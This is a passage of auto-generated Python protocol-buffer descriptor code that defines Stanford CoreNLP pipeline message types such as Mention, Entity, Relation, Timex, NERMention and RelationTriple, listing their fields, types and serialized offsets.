is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='hasContextParseTree', full_name='edu.stanford.nlp.pipeline.Mention.hasContextParseTree', index=27,
number=29, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='headIndexedWord', full_name='edu.stanford.nlp.pipeline.Mention.headIndexedWord', index=28,
number=30, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='dependingVerb', full_name='edu.stanford.nlp.pipeline.Mention.dependingVerb', index=29,
number=31, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='headWord', full_name='edu.stanford.nlp.pipeline.Mention.headWord', index=30,
number=32, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='speakerInfo', full_name='edu.stanford.nlp.pipeline.Mention.speakerInfo', index=31,
number=33, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='sentenceWords', full_name='edu.stanford.nlp.pipeline.Mention.sentenceWords', index=32,
number=50, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='originalSpan', full_name='edu.stanford.nlp.pipeline.Mention.originalSpan', index=33,
number=51, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='dependents', full_name='edu.stanford.nlp.pipeline.Mention.dependents', index=34,
number=52, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='preprocessedTerms', full_name='edu.stanford.nlp.pipeline.Mention.preprocessedTerms', index=35,
number=53, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='appositions', full_name='edu.stanford.nlp.pipeline.Mention.appositions', index=36,
number=54, type=5, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='predicateNominatives', full_name='edu.stanford.nlp.pipeline.Mention.predicateNominatives', index=37,
number=55, type=5, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='relativePronouns', full_name='edu.stanford.nlp.pipeline.Mention.relativePronouns', index=38,
number=56, type=5, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='listMembers', full_name='edu.stanford.nlp.pipeline.Mention.listMembers', index=39,
number=57, type=5, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='belongToLists', full_name='edu.stanford.nlp.pipeline.Mention.belongToLists', index=40,
number=58, type=5, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=4047,
serialized_end=5182,
)
_INDEXEDWORD = _descriptor.Descriptor(
name='IndexedWord',
full_name='edu.stanford.nlp.pipeline.IndexedWord',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='sentenceNum', full_name='edu.stanford.nlp.pipeline.IndexedWord.sentenceNum', index=0,
number=1, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='tokenIndex', full_name='edu.stanford.nlp.pipeline.IndexedWord.tokenIndex', index=1,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='docID', full_name='edu.stanford.nlp.pipeline.IndexedWord.docID', index=2,
number=3, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='copyCount', full_name='edu.stanford.nlp.pipeline.IndexedWord.copyCount', index=3,
number=4, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=5184,
serialized_end=5272,
)
_SPEAKERINFO = _descriptor.Descriptor(
name='SpeakerInfo',
full_name='edu.stanford.nlp.pipeline.SpeakerInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='speakerName', full_name='edu.stanford.nlp.pipeline.SpeakerInfo.speakerName', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='mentions', full_name='edu.stanford.nlp.pipeline.SpeakerInfo.mentions', index=1,
number=2, type=5, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=5274,
serialized_end=5326,
)
_SPAN = _descriptor.Descriptor(
name='Span',
full_name='edu.stanford.nlp.pipeline.Span',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='begin', full_name='edu.stanford.nlp.pipeline.Span.begin', index=0,
number=1, type=13, cpp_type=3, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='end', full_name='edu.stanford.nlp.pipeline.Span.end', index=1,
number=2, type=13, cpp_type=3, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=5328,
serialized_end=5362,
)
_TIMEX = _descriptor.Descriptor(
name='Timex',
full_name='edu.stanford.nlp.pipeline.Timex',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='value', full_name='edu.stanford.nlp.pipeline.Timex.value', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='altValue', full_name='edu.stanford.nlp.pipeline.Timex.altValue', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='text', full_name='edu.stanford.nlp.pipeline.Timex.text', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='type', full_name='edu.stanford.nlp.pipeline.Timex.type', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='tid', full_name='edu.stanford.nlp.pipeline.Timex.tid', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='beginPoint', full_name='edu.stanford.nlp.pipeline.Timex.beginPoint', index=5,
number=6, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='endPoint', full_name='edu.stanford.nlp.pipeline.Timex.endPoint', index=6,
number=7, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=5364,
serialized_end=5483,
)
_ENTITY = _descriptor.Descriptor(
name='Entity',
full_name='edu.stanford.nlp.pipeline.Entity',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='headStart', full_name='edu.stanford.nlp.pipeline.Entity.headStart', index=0,
number=6, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='headEnd', full_name='edu.stanford.nlp.pipeline.Entity.headEnd', index=1,
number=7, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='mentionType', full_name='edu.stanford.nlp.pipeline.Entity.mentionType', index=2,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='normalizedName', full_name='edu.stanford.nlp.pipeline.Entity.normalizedName', index=3,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='headTokenIndex', full_name='edu.stanford.nlp.pipeline.Entity.headTokenIndex', index=4,
number=10, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='corefID', full_name='edu.stanford.nlp.pipeline.Entity.corefID', index=5,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='objectID', full_name='edu.stanford.nlp.pipeline.Entity.objectID', index=6,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='extentStart', full_name='edu.stanford.nlp.pipeline.Entity.extentStart', index=7,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='extentEnd', full_name='edu.stanford.nlp.pipeline.Entity.extentEnd', index=8,
number=3, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='type', full_name='edu.stanford.nlp.pipeline.Entity.type', index=9,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='subtype', full_name='edu.stanford.nlp.pipeline.Entity.subtype', index=10,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=5486,
serialized_end=5705,
)
_RELATION = _descriptor.Descriptor(
name='Relation',
full_name='edu.stanford.nlp.pipeline.Relation',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='argName', full_name='edu.stanford.nlp.pipeline.Relation.argName', index=0,
number=6, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='arg', full_name='edu.stanford.nlp.pipeline.Relation.arg', index=1,
number=7, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='signature', full_name='edu.stanford.nlp.pipeline.Relation.signature', index=2,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='objectID', full_name='edu.stanford.nlp.pipeline.Relation.objectID', index=3,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='extentStart', full_name='edu.stanford.nlp.pipeline.Relation.extentStart', index=4,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='extentEnd', full_name='edu.stanford.nlp.pipeline.Relation.extentEnd', index=5,
number=3, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='type', full_name='edu.stanford.nlp.pipeline.Relation.type', index=6,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='subtype', full_name='edu.stanford.nlp.pipeline.Relation.subtype', index=7,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=5708,
serialized_end=5891,
)
_OPERATOR = _descriptor.Descriptor(
name='Operator',
full_name='edu.stanford.nlp.pipeline.Operator',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='edu.stanford.nlp.pipeline.Operator.name', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='quantifierSpanBegin', full_name='edu.stanford.nlp.pipeline.Operator.quantifierSpanBegin', index=1,
number=2, type=5, cpp_type=1, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='quantifierSpanEnd', full_name='edu.stanford.nlp.pipeline.Operator.quantifierSpanEnd', index=2,
number=3, type=5, cpp_type=1, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='subjectSpanBegin', full_name='edu.stanford.nlp.pipeline.Operator.subjectSpanBegin', index=3,
number=4, type=5, cpp_type=1, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='subjectSpanEnd', full_name='edu.stanford.nlp.pipeline.Operator.subjectSpanEnd', index=4,
number=5, type=5, cpp_type=1, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='objectSpanBegin', full_name='edu.stanford.nlp.pipeline.Operator.objectSpanBegin', index=5,
number=6, type=5, cpp_type=1, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='objectSpanEnd', full_name='edu.stanford.nlp.pipeline.Operator.objectSpanEnd', index=6,
number=7, type=5, cpp_type=1, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=5894,
serialized_end=6072,
)
_POLARITY = _descriptor.Descriptor(
name='Polarity',
full_name='edu.stanford.nlp.pipeline.Polarity',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='projectEquivalence', full_name='edu.stanford.nlp.pipeline.Polarity.projectEquivalence', index=0,
number=1, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='projectForwardEntailment', full_name='edu.stanford.nlp.pipeline.Polarity.projectForwardEntailment', index=1,
number=2, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='projectReverseEntailment', full_name='edu.stanford.nlp.pipeline.Polarity.projectReverseEntailment', index=2,
number=3, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='projectNegation', full_name='edu.stanford.nlp.pipeline.Polarity.projectNegation', index=3,
number=4, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='projectAlternation', full_name='edu.stanford.nlp.pipeline.Polarity.projectAlternation', index=4,
number=5, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='projectCover', full_name='edu.stanford.nlp.pipeline.Polarity.projectCover', index=5,
number=6, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='projectIndependence', full_name='edu.stanford.nlp.pipeline.Polarity.projectIndependence', index=6,
number=7, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=6075,
serialized_end=6628,
)
_NERMENTION = _descriptor.Descriptor(
name='NERMention',
full_name='edu.stanford.nlp.pipeline.NERMention',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='sentenceIndex', full_name='edu.stanford.nlp.pipeline.NERMention.sentenceIndex', index=0,
number=1, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='tokenStartInSentenceInclusive', full_name='edu.stanford.nlp.pipeline.NERMention.tokenStartInSentenceInclusive', index=1,
number=2, type=13, cpp_type=3, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='tokenEndInSentenceExclusive', full_name='edu.stanford.nlp.pipeline.NERMention.tokenEndInSentenceExclusive', index=2,
number=3, type=13, cpp_type=3, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='ner', full_name='edu.stanford.nlp.pipeline.NERMention.ner', index=3,
number=4, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='normalizedNER', full_name='edu.stanford.nlp.pipeline.NERMention.normalizedNER', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='entityType', full_name='edu.stanford.nlp.pipeline.NERMention.entityType', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='timex', full_name='edu.stanford.nlp.pipeline.NERMention.timex', index=6,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='wikipediaEntity', full_name='edu.stanford.nlp.pipeline.NERMention.wikipediaEntity', index=7,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=6631,
serialized_end=6872,
)
_SENTENCEFRAGMENT = _descriptor.Descriptor(
name='SentenceFragment',
full_name='edu.stanford.nlp.pipeline.SentenceFragment',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='tokenIndex', full_name='edu.stanford.nlp.pipeline.SentenceFragment.tokenIndex', index=0,
number=1, type=13, cpp_type=3, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='root', full_name='edu.stanford.nlp.pipeline.SentenceFragment.root', index=1,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assumedTruth', full_name='edu.stanford.nlp.pipeline.SentenceFragment.assumedTruth', index=2,
number=3, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='score', full_name='edu.stanford.nlp.pipeline.SentenceFragment.score', index=3,
number=4, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=6874,
serialized_end=6963,
)
_RELATIONTRIPLE = _descriptor.Descriptor(
name='RelationTriple',
full_name='edu.stanford.nlp.pipeline.RelationTriple',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='subject', full_name='edu.stanford.nlp.pipeline.RelationTriple.subject', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='relation', full_name='edu.stanford.nlp.pipeline.RelationTriple.relation', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='object', full_name='edu.stanford.nlp.pipeline.RelationTriple.object', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='confidence', full_name='edu.stanford.nlp.pipeline.RelationTriple.confidence', index=3,
number=4, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='subjectTokens', full_name='edu.stanford.nlp.pipeline.RelationTriple.subjectTokens', index=4,
number=5, type=13, cpp_type=3, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='relationTokens', full_name='edu.stanford.nlp.pipeline.RelationTriple.relationTokens', index=5,
number=6, type=13, cpp_type=3, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='objectTokens', full_name='edu.stanford.nlp.pipeline.RelationTriple.objectTokens', index=6,
number=7, type=13, cpp_type=3, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='tree', full_name='edu.stanford.nlp.pipeline.RelationTriple.tree', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='istmod', full_name='edu.stanford.nlp.pipeline.RelationTriple.istmod', index=8,
number=9, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='prefixBe', full_name='edu.stanford.nlp.pipeline.RelationTriple.prefixBe', index=9,
number=10, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='suffixBe', full_name='edu.stanford.nlp.pipeline.RelationTriple.suffixBe', index=10,
number=11, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='suffixOf', full_name='edu.stanford.nlp.pipeline.RelationTriple.suffixOf', index=11,
number=12, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=6966,
serialized_end=7250,
)
_MAPSTRINGSTRING = _descriptor.Descriptor(
name='MapStringString',
full_name='edu.stanford.nlp.pipeline.MapStringString',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='edu.stanford.nlp.pipeline.MapStringString.key', index=0,
number=1, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='edu.stanford.nlp.pipeline.MapStringString.value', index=1,
number=2, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=7252,
serialized_end=7297,
)
_MAPINTSTRING = _descriptor.Descriptor(
name='MapIntString',
full_name='edu.stanford.nlp.pipeline.MapIntString',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='edu.stanford.nlp.pipeline.MapIntString.key', index=0,
number=1, type=13, cpp_type=3, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='edu.stanford.nlp.pipeline.MapIntString.value', index=1,
number=2, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=7299,
serialized_end=7341,
)
_DOCUMENT.fields_by_name['sentence'].message_type = _SENTENCE
